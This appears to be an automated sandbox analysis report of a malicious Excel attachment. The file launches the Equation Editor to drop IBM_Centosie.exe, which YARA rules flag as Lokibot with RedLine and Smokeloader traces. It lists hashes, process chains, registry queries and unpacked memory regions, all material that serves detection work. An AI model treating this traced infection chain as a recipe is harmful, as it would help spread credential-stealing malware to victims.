Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1285971294.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: String function: 00407020 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory Jump to behavior
Source: MV_TRANS-ASIA_I.xls OLE indicator, VBA macros: true
Source: IBM_Centosie.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dwmfs[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MV_TRANS-ASIA_I.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\MV_TRANS-ASIA_I.xls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@26/53@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: MV_TRANS-ASIA_I.xls OLE indicator, Workbook stream: true
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00403890 OpenMutexA,FindResourceW,FindResourceA,DdeQueryStringW,_fputc,_puts, 14_2_00403890
Source: MV_TRANS-ASIA_I.xls ReversingLabs: Detection: 26%
Source: MV_TRANS-ASIA_I.xls Virustotal: Detection: 42%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe"
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: unknown Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe" Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe "C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 5_2_0040650A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR333F.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 5_2_0040434D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B3780 CreateToolhelp32Snapshot,Module32First, 5_2_001B3780
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: bibigeye 14_2_00403890
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: Fiv 14_2_00403890
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Command line argument: Yutawi 14_2_00403890
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ~WRD0001.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0004.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD1135.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD2285.tmp.6.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: MV_TRANS-ASIA_I.xls Static file information: File size 1436672 > 1048576
Source: Binary string: [C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, 00000005.00000000.1068812593.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: Binary string: C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: 819E.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B7CB6 push ebp; ret 5_2_001B7CB9
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B50F2 push eax; ret 5_2_001B510D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B59B1 push es; ret 5_2_001B59B3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B86AE push edi; retf 5_2_001B86AF
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B8B08 push E83768D8h; retf 5_2_001B8B0D
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_001B93BB push ds; retf 5_2_001B93C3
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262D27 push eax; ret 5_2_00262D3B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262D27 push eax; ret 5_2_00262D63
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00407065 push ecx; ret 14_2_00407078
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_004034D0 push ecx; mov dword ptr [esp], 00000000h 14_2_004034D1
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00421FE0 push eax; retf 14_2_00421FE1
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_0040A615 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 14_2_0040A615
Source: initial sample Static PE information: section name: .text entropy: 7.6608644971837885
Source: initial sample Static PE information: section name: .text entropy: 7.6608644971837885
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Jump to dropped file
